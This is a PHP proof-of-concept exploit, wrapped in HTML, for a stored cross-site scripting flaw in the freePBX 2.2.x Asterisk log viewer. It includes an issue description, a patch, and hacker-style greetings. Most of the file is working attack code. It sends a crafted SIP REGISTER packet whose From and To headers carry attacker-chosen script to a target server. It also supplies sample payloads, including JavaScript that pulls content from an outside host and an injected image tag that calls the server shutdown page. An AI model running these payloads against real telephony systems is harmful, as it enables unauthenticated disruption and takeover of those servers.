<HTML><BODY style="word-wrap: break-word; -khtml-nbsp-mode: space; -khtml-line-break: after-white-space; " class=""><DIV style=""><FONT class="Apple-style-span" face="Courier">#!/usr/bin/php</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><?php</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">/*</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> \ | | | | | _) </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> |\/ | _ \ __| __ \ | | |\ \ / _` | __ \ __| | __ \ _` |</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> | | __/ | | | | | | | ` < ( | | | | | | | ( |</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> _| _|\___|\__|_| |_|\__, |_| _/\_\\__,_|_| _|\__|_|_| _|\__,_|</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> ____/ </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> ___ \ ___| / Methylxantina 256mg</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> ) | __ \ _ \ __ `__ \ _` | <A href="http://xenomuta.blogspot.com">http://xenomuta.blogspot.com</A></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> __/ ) | ( | | | | ( |</FONT><SPAN class="Apple-tab-span" style="white-space:pre"> </SPAN><FONT class="Apple-style-span" face="Courier"> </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> _____|____/ \___/ _| _| _|\__, | freePBX 2.2.x full-log XSS PoC</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> |___/ by XenoMuta <<A href="mailto:xenomuta@phreaker.net">xenomuta@phreaker.net</A>></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=</FONT><SPAN class="Apple-tab-span" style="white-space:pre"> </SPAN></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">ISSUE:</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">SIP protocol's fields such as From, To, Call-ID, User-Agent (and many others)</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">can carry html tags, wich are shown unfiltered by the Asterisk Log File tools</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">located at http://<freepbx root>/admin/modules/logfiles/asterisk-full-log.php</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">resulting in malicios HMTL or Javascript code injection.</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">IMPACT:</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">Server shutdown/restart, PBX control and Possible remote code execution through </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">amportal options. Just about anything you can code in Javascript.</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">* Note that the amportal's admin will only see the last 2000 lines of full log.</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> for wich an attaker might call the admin asking for support at the time of</FONT></DIV><DIV style=""><SPAN class="Apple-tab-span" style="white-space:pre"> </SPAN><FONT class="Apple-style-span" face="Courier">exploitation.</FONT><SPAN class="Apple-tab-span" style="white-space:pre"> </SPAN><FONT class="Apple-style-span" face="Courier">This doesn't require</FONT><SPAN class="Apple-tab-span" style="white-space:pre"> </SPAN><FONT class="Apple-style-span" face="Courier">authentication or valid credentials >:)</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">WARNING:</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">* Do this on your own risk. Intended for research and educational purposes ONLY.</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">* Neither the author or Methylxantine 256mg are accountable for your actions.</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">* Running this will taint your log file. Make sure you clean it after a test.</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">FIX:</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">Here is a way to fix the problem.</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">[root@asterisk1 ~]# cd /var/www/html/admin/modules/logfiles</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">[root@asterisk1 logfiles]# cat<<EOF|patch</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">*** asterisk-full-log.php 2007-04-18 12:51:10.000000000 -0400</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">--- asterisk-full-log.php.fixed 2007-04-18 12:51:18.000000000 -0400</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">***************</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">*** 10,16 ****</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> <hr></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> <br></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> <?</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">! echo system ('tail --line=2000 /var/log/asterisk/full | sed -e "s/$/<br>/"'); </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> ?></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> </body></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">--- 10,16 ----</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> <hr></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> <br></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> <?</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">! echo system ('tail --line=2000 /var/log/asterisk/full | sed -e "s/</\&lt;/;s/>/\&gt;/" | sed -e "s/$/<br>/"');</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> ?></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> </body></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">EOF</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder"></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder"></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">PAYOLA AND GREETS:</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">:)</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">gr33tz to: </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">- God, for being so faithfull. </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">- Lili, por la paciencia nocturna y por tu amor</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">- the Asterisk team and the freePBX team, for such an EXCELENT product</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">- EMRA, por la fragancia</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">- Leo, te di Luz</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder"></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder"></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">*/</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder"></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print "\x1bc\n\x1b[1m\x1b[30m\x1b[47m";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \r";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \\ | | | | | _) \n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \r";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " |\\/ | _ \\ __| __ \\ | | |\\ \\ / _` | __ \\ __| | __ \\ _` |\n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \r";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " | | __/ | | | | | | | ` < ( | | | | | | | ( |\n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \r";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " _| _|\\___|\\__|_| |_|\\__, |_| _/\\_\\\\__,_|_| _|\\__|_|_| _|\\__,_|\n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \r";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " ____/ \n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \r";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " ___ \\ ___| / Methylxantina 256mg\n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \r";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " ) | __ \\ _ \\ __ `__ \\ _` | <A href="http://xenomuta.blogspot.com\n">http://xenomuta.blogspot.com\n</A>";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \r";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " __/ ) | ( | | | | ( |</FONT><SPAN class="Apple-tab-span" style="white-space:pre"> </SPAN><FONT class="Apple-style-span" face="Courier"> \n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \r";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " _____|____/ \\___/ _| _| _|\\__, | freePBX 2.2.x full-log XSS PoC\n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \r";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " |___/ by XenoMuta <<A href="mailto:xenomuta@phreaker.net">xenomuta@phreaker.net</A>>\n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">print " \n\x1b[0m";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">//COMMENT ME TO PROCEED</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">//die("\x1b[31mWe urge you to read the code first. Comment this line to proceed.\n\x1b[0m");</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">if($argc<2) die("\nUsage: $argv[0] <sip proxy> [custom payload]\n\n");</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">$sipp=$argv[1];</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">if($argc<3){</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">//SOME SAMPLE PAYLOADS FOR YOUR PLEASURE</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">//Execute external Payload (this one only possible with Call-id payload)</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">$payload="<script>var body=document.getElementsByTagName('body');var fly= new Image(), ofly=new Image(), ifly=new Image();ifly.src='<A href="http://xenmut.100webspace.net/fly2.png';ofly.src='http://xenmut.100webspace.net/fly1.png';ofly.onload=eval('var">http://xenmut.100webspace.net/fly2.png';ofly.src='http://xenmut.100webspace.net/fly1.png';ofly.onload=eval('var</A> mv=setInterval(\'move()\',10);');fly.setAttribute('id','fly');fly.style.position='absolute;';fly.style.left='300';fly.style.top='100';body[0].appendChild(fly);var ang,s=2,xx,yy,cal,pi=3.1415926535,ala=true;function calma(){s=2;clearInterval(cal);}function move() {var x,y;x=(s*(Math.sin(ang)));y=(s*(Math.cos(ang)));ala=!ala;if(ala) fly.src=ifly.src;else fly.src=ofly.src;if(Math.round(100*Math.random())>96)ang+=ala?5:-5;if((xx+x>1024)||(xx+x<0)||(yy+y>800)||(yy+y<0)){ang=Math.round(360*Math.random());}else{xx+=x;yy+=y;}fly.style.left=xx+'px';fly.style.top=yy+'px';}function main(){ang=Math.round(360*Math.random());xx=620;yy=400;fly.onmouseover=function(){s=10;ang=Math.round(360*Math.random());clearInterval(cal);cal=setInterval('calma()',500);}}main();</script>";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">//Space Invader (this one only possible with Call-id payload)</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">//$payload="<img width=900 src=<A href="http://www.i-marco.nl/weblog/images/SpaceInvader.jpg">http://www.i-marco.nl/weblog/images/SpaceInvader.jpg</A>>";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">// Server shutdown Payload</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">/*</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> .oOOOo. Oo O o oOoOOoOOo ooOoOOo .oOOOo. o. O </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">.O o o O o O o O .O o. Oo o </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">o O o O o o o O o O O O </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">o oOooOoOo o o O O o O O o o </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">o o O o O o o O o O o O </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">O O o O O O O o O o O O </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">`o .o o O `o Oo O O `o O' o Oo </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> `OoooO' O. O `OoooO'O o' ooOOoOo `OoooO' O `o </FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">*/</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">//$payload='<img src="../sysstatus/shutdown.php">';</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">} else {</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"> $payload=$argv[2];</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">}</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">$ext=1234;</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">$agent="SJphone v1.0";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">$udp=fsockopen("udp://$sipp",5060);</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">$seq=rand(10000,99900);</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">$packet = "REGISTER sip:$sipp SIP/2.0\n".</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">"Via: SIP/2.0/UDP $sipp:5060;rport;branch=z9hG4bK12345\n".</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">"From: $payload\n".</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">"To: $payload\n".</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">"Contact: \"$ext\" <sip:$ext@$sipp:5060>\n".</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">"Call-ID: 12345@$sipp\n".</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">"CSeq: 12345 REGISTER\n".</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">"Expires: 1800\n".</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">"Max-Forwards: 70\n".</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">"User-Agent: $agent\n".</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">"Content-Length: 0\n\n";</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">fputs($udp,$packet);</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">fclose($udp);</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">die("\nPAYLOAD SENT:\n$payload\n");</FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier"><BR class="khtml-block-placeholder" style=""></FONT></DIV><DIV style=""><FONT class="Apple-style-span" face="Courier">?></FONT></DIV></BODY></HTML>